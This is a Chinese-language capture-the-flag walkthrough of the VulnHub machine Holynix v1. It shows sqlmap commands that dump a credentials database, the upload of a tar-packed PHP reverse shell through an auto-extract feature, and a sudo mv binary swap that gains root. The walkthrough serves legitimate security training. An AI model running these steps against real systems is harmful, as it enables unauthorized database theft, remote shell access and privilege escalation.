首页 > 其他分享 >Holynix-v1打靶渗透(权限提升)

Holynix-v1打靶渗透(权限提升)

时间:2024-09-19 08:53:27浏览次数:10  
标签:bin reverse tar -- Holynix 打靶 192.168 v1 php

靶机下载地址:Holynix: v1 ~ VulnHub

1. 主机发现+端口扫描+操作系统等信息收集

确认物理地址

ip扫描
arp-scan-l

端口扫描
nmap 192.168.134.155

访问80端口
192.168.134.155:80

发现登录页面

抓包

sqlmap检测
python3 sqlmap.py -u http://192.168.134.155/index.php?page=login.php --forms --data="username=etenenbaum" --dbs --batch

存在sql注入 查找用户名密码
python3 sqlmap.py -u http://192.168.134.155/index.php?page=login.php --forms --data="username=etenenbaum" -D creds --tables --dump --batch

使用第一个用户名密码

发现用不了 使用第二个

来到用户目录下

上传成功!但是未能成功解析

我们想起来了上面勾选的那个自动解压按钮,利用kali自带的webshell并将其压缩

find / -type f -name "php*reverse*"
cp /usr/share/webshells/php/php-reverse-shell.php ./
tar -czf php.tar.gz php-reverse-shell.php

然后选中自动解压选项,上传

发现成功自动解压,然后利用kali开启监听

 tar czf shell.tar.gz php-reverse-shell.php 

反弹成功

3.提权

sudo -l

利用三方网站

https://gtfobins.github.io/

我们这里选择使用mv提权

sudo mv /bin/tar /bin/tar.bak
sudo mv /bin/su /bin/tar
sudo tar

最后提权成功 root

标签:bin,reverse,tar,--,Holynix,打靶,192.168,v1,php
From: https://blog.csdn.net/2201_75569982/article/details/142217934

相关文章

  • 视频监控平台AS-V1000的场景管理,如何切换不同场景的多画面视频,快速浏览自己需要的实时
    目录一、需求二、分析1.视频管理系统(iVMS)2.地图视图3.多画面分割4.建立多场景管理三、实现方式1、系统介绍(1)AS-V1000介绍(2)平台服务器配置说明2、场景管理(1)如何使用场景管理页面(2)保存场景管理(3)场景列表3、应用效果(1)调用四画面效果(2)调用九画面效果一......
  • 【FLUX大模型】LORA-马卡龙女孩肖像摄影v1.0(附lora文件及在线使用)
    ​​马卡龙女孩肖像摄影lora​这个马卡龙女孩的lora模型已经上线了,可以直接生成马卡龙配色风格的女性肖像,画面干净温柔,配合人物夸张的特写表情,会显得更有张力,特别适合人物情绪的表达以及时尚单品的广告宣传lora特点这个lora是基于flux大模型训练的,所以在真......
  • 地平线占用预测 FlashOcc 参考算法-V1.0
    1.简介3DOccupancyNetworks的基本思路是将三维空间划分成体素网格,并对每个网格进行各类感知任务的预测。目前以网格为中心的方法能够预测每个网格单元的占用率、语义类别、未来运动位移和实例信息。3Doccupancy可以对道路障碍物进行更细粒度的划分,同时获取更精确的占用和语......
  • Sa-Token的v1.39.0自定义鉴权注解怎么玩
    个人博客:无奈何杨(wnhyang)个人语雀:wnhyang共享语雀:在线知识共享Github:wnhyang-Overview简介在Sa-Token最新的v1.39.0版本的更新日志中有这么一句话核心:升级:重构注解鉴权底层,支持自定义鉴权注解了。[重要]正巧最近有看一个关于鉴权的东西,顺便看一下吧!常见的自定义注解鉴权目标:对于......
  • Sparse4D v1
    Sparse4D:Multi-view3DObjectDetectionwithSparseSpatial-TemporalFusionAbstract基于鸟瞰图(BEV)的方法最近在多视图3D检测任务方面取得了重大进展。与基于BEV的方法相比,基于稀疏的方法在性能上落后,但仍然有很多不可忽略的优点。为了进一步推动稀疏3D检测,......
  • 赛事报名系统V1.1.3
    赛事报名系统,包含个人报名和团队报名、成绩查询、成绩证书等。提供全部无加密源码,支持私有化部署。V1.1.3修复系统BUG1.更新小程序端组别太多导致的遮挡问题2.更新后台子管理员的菜单权限问题......
  • 75V摄影灯影视灯IC-H5228 LED升降压恒流芯片 支持9V12V24V18V24V30V36V40V52V60V72V方
    H5228LED升降压恒流芯片:照明解决方案的新选择在LED照明领域,寻找一款性能好、功能恒流驱动芯片一直是工程师们的追求。今天,我们要为大家介绍的H5228LED升降压恒流芯片,就是这样一款能够满足多种应用需求的产品。一、产品概述H5228是一款调光特性良好、无频闪的LED恒流驱动器。它支......
  • 开源模型应用落地-qwen2-7b-instruct-LoRA微调-unsloth(让微调起飞)-单机单卡-V100(十七)
    一、前言  本篇文章将在v100单卡服务器上,使用unsloth去高效微调QWen2系列模型,通过阅读本文,您将能够更好地掌握这些关键技术,理解其中的关键技术要点,并应用于自己的项目中。  使用unsloth能够使模型的微调速度提高2-5倍。在处理大规模数据或对时间要求较高的场景下......
  • 多商户消费券V1.0.0
    微信公众号开发的在微信上发布消费代金券的系统。支持发布多商户跨店统一消费券,拉动消费。适用于商圈/商场/景区/社区/街区/综合体/连锁店等。简洁易用,功能闭环。V1.0.0发布版本......
  • 餐厅预订系统V1.0.0
    餐厅预定桌位系统,支持多店切换预约,提供全部前后台无加密源代码和数据库,支持私有化部署。V1.0.0发布版本......